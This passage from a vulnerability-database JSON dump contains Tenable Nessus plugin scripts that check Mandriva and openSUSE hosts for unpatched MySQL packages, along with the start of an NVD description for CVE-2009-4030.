yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-client-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-common-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-max-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-ndb-extra-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-ndb-management-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-ndb-storage-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2008.0\", reference:\"mysql-ndb-tools-5.0.45-8.4mdv2008.0\", yank:\"mdv\")) flag++;\n\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64mysql-devel-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64mysql-static-devel-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"x86_64\", reference:\"lib64mysql15-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libmysql-devel-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libmysql-static-devel-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", cpu:\"i386\", reference:\"libmysql15-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-bench-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-client-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-common-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-doc-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-max-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-extra-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-management-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-storage-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2009.0\", reference:\"mysql-ndb-tools-5.0.89-0.1mdv2009.0\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T16:48:21", "references": ["https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669"], "pluginID": "46219", "description": "This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)", "edition": 6, "reporter": "Tenable", "published": "2010-05-04T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_1_LIBMYSQLCLIENT-DEVEL-091216.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46219", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-1706.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46219);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-1)\");\n script_summary(english:\"Check for the libmysqlclient-devel-1706 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update fixes several security issues in mysql :\n\n - checking server certificates (CVE-2009-4028)\n\n - error handling in subqueries (CVE-2009-4019)\n\n - preserving null_value flag in GeomFromWKB\n (CVE-2009-4019)\n\n - symlink behavior fixed (CVE-2008-7247)\n\n - symlink behavior refixed (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00000.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient-devel-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient15-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient_r15-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-Max-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-bench-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-client-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-debug-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-test-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-tools-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-12.17.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.67-12.17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T17:12:14", "references": ["https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669"], "pluginID": "46229", "description": "Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed (CVE-2009-4030)", "edition": 6, "reporter": "Tenable", "published": "2010-05-05T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-10T00:00:00", "cpe": ["cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_0_LIBMYSQLCLIENT-DEVEL-100504.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46229", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-2315.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46229);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)\");\n script_summary(english:\"Check for the libmysqlclient-devel-2315 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/05/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient-devel-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient15-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"libmysqlclient_r15-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-Max-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-bench-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-client-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-debug-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"mysql-tools-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.51a-27.8\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.51a-27.8\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-13T17:00:07", "references": ["https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html", "https://bugzilla.novell.com/show_bug.cgi?id=557669"], "pluginID": "46232", "description": "Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed (CVE-2009-4030)", "edition": 6, "reporter": "Tenable", "published": "2010-05-05T00:00:00", "title": "openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-11-10T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:mysql-test", "p-cpe:/a:novell:opensuse:mysql", "p-cpe:/a:novell:opensuse:mysql-client", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit", "p-cpe:/a:novell:opensuse:mysql-tools", "p-cpe:/a:novell:opensuse:libmysqlclient-devel", "p-cpe:/a:novell:opensuse:mysql-Max", "p-cpe:/a:novell:opensuse:libmysqlclient15-32bit", "p-cpe:/a:novell:opensuse:mysql-debug", "p-cpe:/a:novell:opensuse:libmysqlclient_r15", "p-cpe:/a:novell:opensuse:mysql-bench", "p-cpe:/a:novell:opensuse:libmysqlclient15"], "id": "SUSE_11_1_LIBMYSQLCLIENT-DEVEL-100401.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=46232", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update libmysqlclient-devel-2315.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(46232);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:58\");\n\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n\n script_name(english:\"openSUSE Security Update : libmysqlclient-devel (openSUSE-SU-2010:0198-2)\");\n script_summary(english:\"Check for the libmysqlclient-devel-2315 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated mysql packages fix the following bugs :\n\n - upstream #47320 - checking server certificates\n (CVE-2009-4028)\n\n - upstream #48291 - error handling in subqueries\n (CVE-2009-4019)\n\n - upstream #47780 - preserving null_value flag in\n GeomFromWKB() (CVE-2009-4019)\n\n - upstream #39277 - symlink behaviour fixed\n (CVE-2008-7247)\n\n - upstream #32167 - symlink behaviour refixed\n (CVE-2009-4030)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=557669\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2010-05/msg00006.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmysqlclient-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cwe_id(20, 59);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libmysqlclient_r15-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-Max\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:mysql-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/04/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient-devel-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient15-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"libmysqlclient_r15-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-Max-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-bench-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-client-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-debug-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-test-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"mysql-tools-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient15-32bit-5.0.67-12.17.7\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"libmysqlclient_r15-32bit-5.0.67-12.17.7\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmysqlclient-devel / libmysqlclient15 / libmysqlclient15-32bit / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2018-01-05T12:19:53", "references": ["http://www.debian.org/security/2010/dsa-1997", "http://www.openwall.com/lists/oss-security/2009/11/24/6", "http://www.ubuntu.com/usn/USN-1397-1", "http://marc.info/?l=oss-security&m=125908080222685&w=2", "http://marc.info/?l=oss-security&m=125908040022018&w=2", "http://www.vupen.com/english/advisories/2010/1107", "http://www.redhat.com/support/errata/RHSA-2010-0109.html", "http://ubuntu.com/usn/usn-897-1", "http://www.redhat.com/support/errata/RHSA-2010-0110.html", "http://lists.opensuse.org/opensuse-security-announce/2010-05/msg00001.html", "http://support.apple.com/kb/HT4077", "http://lists.mysql.com/commits/89940", "http://bugs.mysql.com/bug.php?id=32167", "http://lists.opensuse.org/opensuse-security-announce/2010-11/msg00005.html", "http://lists.apple.com/archives/security-announce/2010//Mar/msg00001.html", "http://www.openwall.com/lists/oss-security/2009/11/19/3", "http://dev.mysql.com/doc/refman/5.1/en/news-5-1-41.html"], "description": "MySQL 5.1.x before 5.1.41 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL data home directory, related to incorrect calculation of the mysql_unpacked_real_data_home value. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4098 and CVE-2008-2079.", "edition": 3, "reporter": "NVD", "published": "2009-11-30T12:30:00", "title": "CVE-2009-4030", "type": "cve", 